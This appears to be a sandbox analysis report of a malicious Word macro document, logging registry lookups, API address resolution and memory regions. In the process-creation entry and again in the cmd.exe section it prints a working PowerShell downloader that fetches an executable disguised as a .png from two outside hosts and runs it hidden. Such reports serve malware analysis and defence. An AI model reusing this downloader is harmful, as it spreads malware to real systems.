Module	Get Address	module_name = Unknown module name, function = VarIdiv, address_out = 0x7feff658ff0	1	Fn
Module	Get Address	module_name = Unknown module name, function = VarImp, address_out = 0x7feff659c00	1	Fn
Module	Get Address	module_name = Unknown module name, function = VarMod, address_out = 0x7feff658e60	1	Fn
Module	Get Address	module_name = Unknown module name, function = VarMul, address_out = 0x7feff653690	1	Fn
Module	Get Address	module_name = Unknown module name, function = VarOr, address_out = 0x7feff6592d0	1	Fn
Module	Get Address	module_name = Unknown module name, function = VarPow, address_out = 0x7feff652e80	1	Fn
Module	Get Address	module_name = Unknown module name, function = VarSub, address_out = 0x7feff653f90	1	Fn
Module	Get Address	module_name = Unknown module name, function = VarXor, address_out = 0x7feff6591a0	1	Fn
Module	Get Address	module_name = Unknown module name, function = VarAbs, address_out = 0x7feff637c30	1	Fn
Module	Get Address	module_name = Unknown module name, function = VarFix, address_out = 0x7feff637a60	1	Fn
Module	Get Address	module_name = Unknown module name, function = VarInt, address_out = 0x7feff637890	1	Fn
Module	Get Address	module_name = Unknown module name, function = VarNeg, address_out = 0x7feff637ea0	1	Fn
Module	Get Address	module_name = Unknown module name, function = VarNot, address_out = 0x7feff659600	1	Fn
Module	Get Address	module_name = Unknown module name, function = VarRound, address_out = 0x7feff6376a0	1	Fn
Module	Get Address	module_name = Unknown module name, function = VarCmp, address_out = 0x7feff6583f0	1	Fn
Module	Get Address	module_name = Unknown module name, function = VarDecAdd, address_out = 0x7feff603070	1	Fn
Module	Get Address	module_name = Unknown module name, function = VarDecCmp, address_out = 0x7feff60d700	1	Fn
Module	Get Address	module_name = Unknown module name, function = VarBstrCat, address_out = 0x7feff60d890	1	Fn
Module	Get Address	module_name = Unknown module name, function = VarCyMulI4, address_out = 0x7feff5ecaf0	1	Fn
Module	Get Address	module_name = Unknown module name, function = VarBstrCmp, address_out = 0x7feff5f8a00	1	Fn
Module	Get Handle	module_name = ole32.dll, base_address = 0x7fefede0000	1	Fn
Module	Get Address	module_name = Unknown module name, function = CoCreateInstanceEx, address_out = 0x7fefedede90	1	Fn
Module	Get Address	module_name = Unknown module name, function = CLSIDFromProgIDEx, address_out = 0x7fefedfa4c4	1	Fn
System	Get Time	type = Local Time, time = 2017-09-26 00:02:34 (Local Time)	1	Fn
System	Get Time	type = Local Time, time = 2017-09-26 00:02:35 (Local Time)	1	Fn
Module	Get Address	module_name = Unknown module name, function = MsoMultiByteToWideChar, address_out = 0x7fee8ab005c	1	Fn
Registry	Open Key	reg_name = HKEY_CLASSES_ROOT\TypeLib	1	Fn
Registry	Open Key	reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}	1	Fn
Registry	Open Key	reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.6	1	Fn
Registry	Open Key	reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.6\409	1	Fn
Registry	Open Key	reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.6\9	1	Fn
Registry	Open Key	reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.6\0	1	Fn
Registry	Open Key	reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.6\0\win64	1	Fn
Registry	Open Key	reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.6\0	1	Fn
Registry	Read Value	reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.6\0\win64, data = C:\Program Files\Microsoft Office\Office15\MSWORD.OLB	1	Fn
Module	Get Filename	process_name = c:\program files\microsoft office\office15\winword.exe, file_name_orig = C:\PROGRA~1\COMMON~1\MICROS~1\VBA\VBA7.1\VBE7.DLL, size = 260	1	Fn
Registry	Open Key	reg_name = HKEY_CLASSES_ROOT\TypeLib	1	Fn
Registry	Open Key	reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}	1	Fn
Registry	Open Key	reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0	1	Fn
Registry	Open Key	reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0	1	Fn
Registry	Open Key	reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0\win64	1	Fn
Registry	Open Key	reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0	1	Fn
Registry	Read Value	reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0\win64, data = C:\Windows\system32\stdole2.tlb	1	Fn
Registry	Open Key	reg_name = HKEY_CLASSES_ROOT\TypeLib	1	Fn
Registry	Open Key	reg_name = HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}	1	Fn
Registry	Open Key	reg_name = HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.7	1	Fn
Registry	Open Key	reg_name = HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.7\0	1	Fn
Registry	Open Key	reg_name = HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.7\0\win64	1	Fn
Registry	Open Key	reg_name = HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.7\0	1	Fn
Registry	Read Value	reg_name = HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.7\0\win64, data = C:\Program Files\Common Files\Microsoft Shared\OFFICE15\MSO.DLL	1	Fn
Registry	Open Key	reg_name = HKEY_CLASSES_ROOT\TypeLib	1	Fn
Registry	Open Key	reg_name = HKEY_CLASSES_ROOT\TypeLib\{000204EF-0000-0000-C000-000000000046}	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_CLASSES_ROOT\TypeLib\{000204EF-0000-0000-C000-000000000046}	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_CLASSES_ROOT\TypeLib\{000204EF-0000-0000-C000-000000000046}	1	Fn
Registry	Open Key	reg_name = HKEY_CLASSES_ROOT\TypeLib\{000204EF-0000-0000-C000-000000000046}\4.2	1	Fn
Registry	Open Key	reg_name = HKEY_CLASSES_ROOT\TypeLib\{000204EF-0000-0000-C000-000000000046}\4.2\9	1	Fn
Registry	Open Key	reg_name = HKEY_CLASSES_ROOT\TypeLib\{000204EF-0000-0000-C000-000000000046}\4.2\9\win64	1	Fn
Registry	Open Key	reg_name = HKEY_CLASSES_ROOT\TypeLib\{000204EF-0000-0000-C000-000000000046}\4.2\9	1	Fn
Registry	Read Value	reg_name = HKEY_CLASSES_ROOT\TypeLib\{000204EF-0000-0000-C000-000000000046}\4.2\9\win64, data = C:\PROGRA~1\COMMON~1\MICROS~1\VBA\VBA7.1\VBE7.DLL	1	Fn
Registry	Open Key	reg_name = HKEY_CLASSES_ROOT\TypeLib	1	Fn
Registry	Open Key	reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}	1	Fn
Registry	Open Key	reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.6	1	Fn
Registry	Open Key	reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.6\0	1	Fn
Registry	Open Key	reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.6\0\win64	1	Fn
Registry	Open Key	reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.6\0	1	Fn
Registry	Read Value	reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.6\0\win64, data = C:\Program Files\Microsoft Office\Office15\MSWORD.OLB	1	Fn
Registry	Open Key	reg_name = HKEY_CLASSES_ROOT\TypeLib	1	Fn
Registry	Open Key	reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}	1	Fn
Registry	Open Key	reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0	1	Fn
Registry	Open Key	reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0	1	Fn
Registry	Open Key	reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0\win64	1	Fn
Registry	Open Key	reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0	1	Fn
Registry	Read Value	reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0\win64, data = C:\Windows\system32\stdole2.tlb	1	Fn
Registry	Open Key	reg_name = HKEY_CLASSES_ROOT\TypeLib	1	Fn
Registry	Open Key	reg_name = HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}	1	Fn
Registry	Open Key	reg_name = HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.7	1	Fn
Registry	Open Key	reg_name = HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.7\0	1	Fn
Registry	Open Key	reg_name = HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.7\0\win64	1	Fn
Registry	Open Key	reg_name = HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.7\0	1	Fn
Registry	Read Value	reg_name = HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.7\0\win64, data = C:\Program Files\Common Files\Microsoft Shared\OFFICE15\MSO.DLL	1	Fn
Registry	Open Key	reg_name = HKEY_CLASSES_ROOT\TypeLib	1	Fn
Registry	Open Key	reg_name = HKEY_CLASSES_ROOT\TypeLib\{0D452EE1-E08F-101A-852E-02608C4D0BB4}	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_CLASSES_ROOT\TypeLib\{0D452EE1-E08F-101A-852E-02608C4D0BB4}	1	Fn
Registry	Open Key	reg_name = HKEY_CLASSES_ROOT\TypeLib\{0D452EE1-E08F-101A-852E-02608C4D0BB4}\2.0	1	Fn
Registry	Open Key	reg_name = HKEY_CLASSES_ROOT\TypeLib\{0D452EE1-E08F-101A-852E-02608C4D0BB4}\2.0\0	1	Fn
Registry	Open Key	reg_name = HKEY_CLASSES_ROOT\TypeLib\{0D452EE1-E08F-101A-852E-02608C4D0BB4}\2.0\0\win64	1	Fn
Registry	Open Key	reg_name = HKEY_CLASSES_ROOT\TypeLib\{0D452EE1-E08F-101A-852E-02608C4D0BB4}\2.0\0	1	Fn
Registry	Read Value	reg_name = HKEY_CLASSES_ROOT\TypeLib\{0D452EE1-E08F-101A-852E-02608C4D0BB4}\2.0\0\win64, data = C:\Windows\system32\FM20.DLL	1	Fn
System	Get Time	type = Local Time, time = 2017-09-26 00:02:35 (Local Time)	8	Fn
Registry	Open Key	reg_name = HKEY_CLASSES_ROOT\CLSID\{C62A69F0-16DC-11CE-9E98-00AA00574A4F}\DesignerFeatures	1	Fn
Registry	Open Key	reg_name = HKEY_CLASSES_ROOT\Clsid\{C62A69F0-16DC-11CE-9E98-00AA00574A4F}\InprocServer32	1	Fn
Registry	Read Value	reg_name = HKEY_CLASSES_ROOT\Clsid\{C62A69F0-16DC-11CE-9E98-00AA00574A4F}\InprocServer32, value_name = ThreadingModel, data = 65	1	Fn
Registry	Read Value	reg_name = HKEY_CLASSES_ROOT\Clsid\{C62A69F0-16DC-11CE-9E98-00AA00574A4F}\Instance CLSID, data = {C62A69F0-16DC-11CE-9E98-00AA00574A4F}	2	Fn
System	Get Cursor	x_out = 17, y_out = 631	1	Fn
System	Get Time	type = Local Time, time = 2017-09-26 00:02:35 (Local Time)	2	Fn
Registry	Open Key	reg_name = HKEY_CLASSES_ROOT\TypeLib	1	Fn
Registry	Open Key	reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}	1	Fn
Registry	Open Key	reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.6	1	Fn
Registry	Open Key	reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.6\409	1	Fn
Registry	Open Key	reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.6\9	1	Fn
Registry	Open Key	reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.6\0	1	Fn
Registry	Open Key	reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.6\0\win64	1	Fn
Registry	Open Key	reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.6\0	1	Fn
Registry	Read Value	reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.6\0\win64, data = C:\Program Files\Microsoft Office\Office15\MSWORD.OLB	1	Fn
System	Get Time	type = Local Time, time = 2017-09-26 00:02:35 (Local Time)	1	Fn
Module	Get Filename	process_name = c:\program files\microsoft office\office15\winword.exe, file_name_orig = C:\PROGRA~1\COMMON~1\MICROS~1\VBA\VBA7.1\VBE7.DLL, size = 260	1	Fn
System	Get Cursor	x_out = 17, y_out = 631	1	Fn
System	Get Time	type = Local Time, time = 2017-09-26 00:02:35 (Local Time)	7	Fn
Registry	Open Key	reg_name = HKEY_CLASSES_ROOT\Clsid\{82B02373-B5BC-11CF-810F-00A0C9030074}	1	Fn
Registry	Open Key	reg_name = HKEY_CLASSES_ROOT\Clsid\{82B02373-B5BC-11CF-810F-00A0C9030074}\Control	1	Fn
Registry	Open Key	reg_name = HKEY_CLASSES_ROOT\Clsid\{82B02373-B5BC-11CF-810F-00A0C9030074}\Insertable	1	Fn
Registry	Open Key	reg_name = HKEY_CLASSES_ROOT\Clsid\{82B02374-B5BC-11CF-810F-00A0C9030074}	1	Fn
Registry	Open Key	reg_name = HKEY_CLASSES_ROOT\Clsid\{82B02374-B5BC-11CF-810F-00A0C9030074}\Control	1	Fn
Registry	Open Key	reg_name = HKEY_CLASSES_ROOT\Clsid\{82B02374-B5BC-11CF-810F-00A0C9030074}\Insertable	1	Fn
Registry	Open Key	reg_name = HKEY_CLASSES_ROOT\Clsid\{82B02375-B5BC-11CF-810F-00A0C9030074}	1	Fn
Registry	Open Key	reg_name = HKEY_CLASSES_ROOT\Clsid\{82B02375-B5BC-11CF-810F-00A0C9030074}\Control	1	Fn
Registry	Open Key	reg_name = HKEY_CLASSES_ROOT\Clsid\{82B02375-B5BC-11CF-810F-00A0C9030074}\Insertable	1	Fn
Registry	Open Key	reg_name = HKEY_CLASSES_ROOT\Clsid\{8A683C92-BA84-11CF-8110-00A0C9030074}	1	Fn
Registry	Open Key	reg_name = HKEY_CLASSES_ROOT\Clsid\{8A683C92-BA84-11CF-8110-00A0C9030074}\Control	1	Fn
Registry	Open Key	reg_name = HKEY_CLASSES_ROOT\Clsid\{8A683C92-BA84-11CF-8110-00A0C9030074}\Insertable	1	Fn
Registry	Open Key	reg_name = HKEY_CLASSES_ROOT\Clsid\{8A683C93-BA84-11CF-8110-00A0C9030074}	1	Fn
Registry	Open Key	reg_name = HKEY_CLASSES_ROOT\Clsid\{8A683C93-BA84-11CF-8110-00A0C9030074}\Control	1	Fn
Registry	Open Key	reg_name = HKEY_CLASSES_ROOT\Clsid\{8A683C93-BA84-11CF-8110-00A0C9030074}\Insertable	1	Fn
Registry	Open Key	reg_name = HKEY_CLASSES_ROOT\Clsid\{1C3B4210-F441-11CE-B9EA-00AA006B1A69}	1	Fn
Registry	Open Key	reg_name = HKEY_CLASSES_ROOT\Clsid\{1C3B4210-F441-11CE-B9EA-00AA006B1A69}\Control	1	Fn
Registry	Open Key	reg_name = HKEY_CLASSES_ROOT\Clsid\{1C3B4210-F441-11CE-B9EA-00AA006B1A69}\Insertable	1	Fn
Registry	Open Key	reg_name = HKEY_CLASSES_ROOT\Clsid\{909E0AE0-16DC-11CE-9E98-00AA00574A4F}	1	Fn
Registry	Open Key	reg_name = HKEY_CLASSES_ROOT\Clsid\{909E0AE0-16DC-11CE-9E98-00AA00574A4F}\Control	1	Fn
Registry	Open Key	reg_name = HKEY_CLASSES_ROOT\Clsid\{909E0AE0-16DC-11CE-9E98-00AA00574A4F}\Insertable	1	Fn
Registry	Open Key	reg_name = HKEY_CLASSES_ROOT\Clsid\{AFC20920-DA4E-11CE-B943-00AA006887B4}	1	Fn
Registry	Open Key	reg_name = HKEY_CLASSES_ROOT\Clsid\{AFC20920-DA4E-11CE-B943-00AA006887B4}\Control	1	Fn
Registry	Open Key	reg_name = HKEY_CLASSES_ROOT\Clsid\{AFC20920-DA4E-11CE-B943-00AA006887B4}\Insertable	1	Fn
Registry	Open Key	reg_name = HKEY_CLASSES_ROOT\Clsid\{5CEF5610-713D-11CE-80C9-00AA00611080}	1	Fn
Registry	Open Key	reg_name = HKEY_CLASSES_ROOT\Clsid\{5CEF5610-713D-11CE-80C9-00AA00611080}\Control	1	Fn
Registry	Open Key	reg_name = HKEY_CLASSES_ROOT\Clsid\{5CEF5610-713D-11CE-80C9-00AA00611080}\Insertable	1	Fn
Module	Get Address	module_name = Unknown module name, function = RegisterTypeLibForUser, address_out = 0x7feff626430	1	Fn
Module	Get Address	module_name = c:\windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\comctl32.dll, function = ImageList_Destroy, address_out = 0x7fefc0207a4	1	Fn
Module	Get Address	module_name = c:\windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\comctl32.dll, function = ImageList_GetIconSize, address_out = 0x7fefc021010	1	Fn
Module	Get Address	module_name = c:\windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\comctl32.dll, function = InitCommonControls, address_out = 0x7fefc0f8b5c	1	Fn
Module	Get Address	module_name = c:\windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\comctl32.dll, function = ImageList_LoadImageA, address_out = 0x7fefc0201a8	1	Fn
Module	Get Address	module_name = c:\windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\comctl32.dll, function = ImageList_SetOverlayImage, address_out = 0x7fefc020a70	1	Fn
Module	Get Address	module_name = c:\windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\comctl32.dll, function = ImageList_AddMasked, address_out = 0x7fefc020b60	1	Fn
Module	Get Address	module_name = c:\windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\comctl32.dll, function = ImageList_GetImageInfo, address_out = 0x7fefc021180	1	Fn
Module	Get Address	module_name = c:\windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\comctl32.dll, function = ImageList_Draw, address_out = 0x7fefc020cd8	1	Fn
Module	Get Address	module_name = c:\windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\comctl32.dll, function = ImageList_DrawEx, address_out = 0x7fefc020bdc	1	Fn
Module	Get Address	module_name = c:\windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\comctl32.dll, function = PropertySheetA, address_out = 0x7fefc005c64	1	Fn
Module	Get Address	module_name = c:\windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\comctl32.dll, function = DestroyPropertySheetPage, address_out = 0x7fefbfff018	1	Fn
Module	Get Address	module_name = c:\windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\comctl32.dll, function = CreatePropertySheetPageA, address_out = 0x7fefbfffce8	1	Fn
Registry	Read Value	reg_name = HKEY_CLASSES_ROOT\Clsid\{C62A69F0-16DC-11CE-9E98-00AA00574A4F}\Instance CLSID, data = {C62A69F0-16DC-11CE-9E98-00AA00574A4F}	1	Fn
COM	Create	interface = 00000001-0000-0000-C000-000000000046, cls_context = CLSCTX_INPROC_SERVER, CLSCTX_INPROC_HANDLER	1	Fn
Window	Set Attribute	index = 18446744073709551596, new_long = 262401	1	Fn
Registry	Read Value	reg_name = HKEY_CLASSES_ROOT\Clsid\{C62A69F0-16DC-11CE-9E98-00AA00574A4F}\Instance CLSID, data = {C62A69F0-16DC-11CE-9E98-00AA00574A4F}	1	Fn
Window	Set Attribute	index = 18446744073709551596, new_long = 262401	1	Fn
System	Get Time	type = Local Time, time = 2017-09-26 00:02:38 (Local Time)	2	Fn
Registry	Read Value	reg_name = HKEY_CLASSES_ROOT\Clsid\{C62A69F0-16DC-11CE-9E98-00AA00574A4F}\Instance CLSID, data = {C62A69F0-16DC-11CE-9E98-00AA00574A4F}	1	Fn
Window	Set Attribute	index = 18446744073709551596, new_long = 262401	1	Fn
System	Get Time	type = Local Time, time = 2017-09-26 00:02:38 (Local Time)	5	Fn
Module	Get Address	module_name = Unknown module name, function = 600, address_out = 0x7fee8df9f28	1	Fn
Module	Get Address	module_name = Unknown module name, function = 594, address_out = 0x7fee8f97268	1	Fn
Module	Get Address	module_name = Unknown module name, function = 593, address_out = 0x7fee8f97298	1	Fn
Module	Get Address	module_name = Unknown module name, function = 632, address_out = 0x7fee8e22778	1	Fn
System	Get Time	type = Local Time, time = 2017-09-26 00:02:38 (Local Time)	1	Fn
Registry	Read Value	reg_name = HKEY_CLASSES_ROOT\Clsid\{C62A69F0-16DC-11CE-9E98-00AA00574A4F}\Instance CLSID, data = {C62A69F0-16DC-11CE-9E98-00AA00574A4F}	1	Fn
Window	Set Attribute	index = 18446744073709551596, new_long = 262401	1	Fn
System	Get Time	type = Local Time, time = 2017-09-26 00:02:38 (Local Time)	3	Fn
Module	Get Address	module_name = Unknown module name, function = 681, address_out = 0x7fee8f968e0	1	Fn
Process	Create	process_name = cmd /c PowerShell "'PowerShell ""function mihyr8([String] $yxuinzaisib){(New-Object System.Net.WebClient).DownloadFile($yxuinzaisib,''%TMP%\Mvmubw.exe'');Start-Process ''%TMP%\Mvmubw.exe'';}try{mihyr8(''http://www.events4u.cz/kas23.png'')}catch{mihyr8(''http://tregartha-dinnie.co.uk/kas23.png'')}'"" \| Out-File -encoding ASCII -FilePath %TMP%\Mbovxo.bat;Start-Process '%TMP%\Mbovxo.bat' -WindowStyle Hidden", os_pid = 0x9e0, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE	1	Fn
Module	Get Address	module_name = Unknown module name, function = 594, address_out = 0x7fee8f97268	1	Fn
Module	Get Address	module_name = Unknown module name, function = 593, address_out = 0x7fee8f97298	1	Fn
Module	Get Address	module_name = Unknown module name, function = 632, address_out = 0x7fee8e22778	1	Fn
Module	Get Address	module_name = Unknown module name, function = 681, address_out = 0x7fee8f968e0	1	Fn
Module	Get Address	module_name = Unknown module name, function = 600, address_out = 0x7fee8df9f28	1	Fn
Module	Get Address	module_name = Unknown module name, function = 594, address_out = 0x7fee8f97268	1	Fn
Module	Get Address	module_name = Unknown module name, function = 593, address_out = 0x7fee8f97298	1	Fn
Module	Get Address	module_name = Unknown module name, function = 632, address_out = 0x7fee8e22778	1	Fn
Module	Get Address	module_name = Unknown module name, function = 681, address_out = 0x7fee8f968e0	1	Fn
Module	Get Address	module_name = Unknown module name, function = 600, address_out = 0x7fee8df9f28	1	Fn
Registry	Write Value	value_name = PropertiesWindow, data = 4 24 180 720 1, size = 15, type = REG_SZ	1	Fn
Registry	Write Value	value_name = MainWindow, data = 0 0 0 0 1, size = 10, type = REG_SZ	1	Fn
Registry	Write Value	value_name = MdiMaximized, data = 0, size = 2, type = REG_SZ	1	Fn
Registry	Write Value	value_name = FolderView, data = 1, size = 2, type = REG_SZ	1	Fn
Registry	Write Value	value_name = Tool, size = 24, type = REG_BINARY	1	Fn Data
Registry	Write Value	value_name = CtlsShowSelected, data = 0, size = 2, type = REG_SZ	1	Fn
Registry	Write Value	value_name = DsnShowSelected, data = 0, size = 2, type = REG_SZ	1	Fn

Process #2: cmd.exe

(Host: 61, Network: 0)

Information	Value
ID	#2
File Name	c:\windows\system32\cmd.exe
Command Line	cmd /c PowerShell "'PowerShell ""function mihyr8([String] $yxuinzaisib){(New-Object System.Net.WebClient).DownloadFile($yxuinzaisib,''%TMP%\Mvmubw.exe'');Start-Process ''%TMP%\Mvmubw.exe'';}try{mihyr8(''http://www.events4u.cz/kas23.png'')}catch{mihyr8(''http://tregartha-dinnie.co.uk/kas23.png'')}'"" \| Out-File -encoding ASCII -FilePath %TMP%\Mbovxo.bat;Start-Process '%TMP%\Mbovxo.bat' -WindowStyle Hidden"
Initial Working Directory	C:\Users\aDU0VK IWA5kLS\Desktop\
Monitor	Start Time: 00:00:36, Reason: Child Process
Unmonitor	End Time: 00:02:26, Reason: Terminated by Timeout
Monitor Duration	00:01:50

OS Process Information

Information	Value
PID	0x9e0
Parent PID	0x914 (c:\program files\microsoft office\office15\winword.exe)
Is Created or Modified Executable
Integrity Level	Medium
Username	AUFDDCNTXWT\aDU0VK IWA5kLS
Groups	AUFDDCNTXWT\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) BUILTIN\Administrators (USE_FOR_DENY_ONLY) BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Logon Session 00000000:000103d4 (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID) LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x 9E4

Region

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000010000	0x00010000	0x0002ffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	Readable, Writable	Region Actions
pagefile_0x0000000000020000	0x00020000	0x0002ffff	Pagefile Backed Memory	Readable, Writable	Region Actions
pagefile_0x0000000000030000	0x00030000	0x00033fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000040000	0x00040000	0x00040fff	Pagefile Backed Memory	Readable	Region Actions
locale.nls	0x00050000	0x000b6fff	Memory Mapped File	Readable	Region Actions
pagefile_0x00000000000c0000	0x000c0000	0x000c6fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x00000000000d0000	0x000d0000	0x000d1fff	Pagefile Backed Memory	Readable, Writable	Region Actions
private_0x00000000000e0000	0x000e0000	0x000e0fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x00000000000f0000	0x000f0000	0x000f0fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000000130000	0x00130000	0x0022ffff	Private Memory	Readable, Writable	Region Actions Download Dump
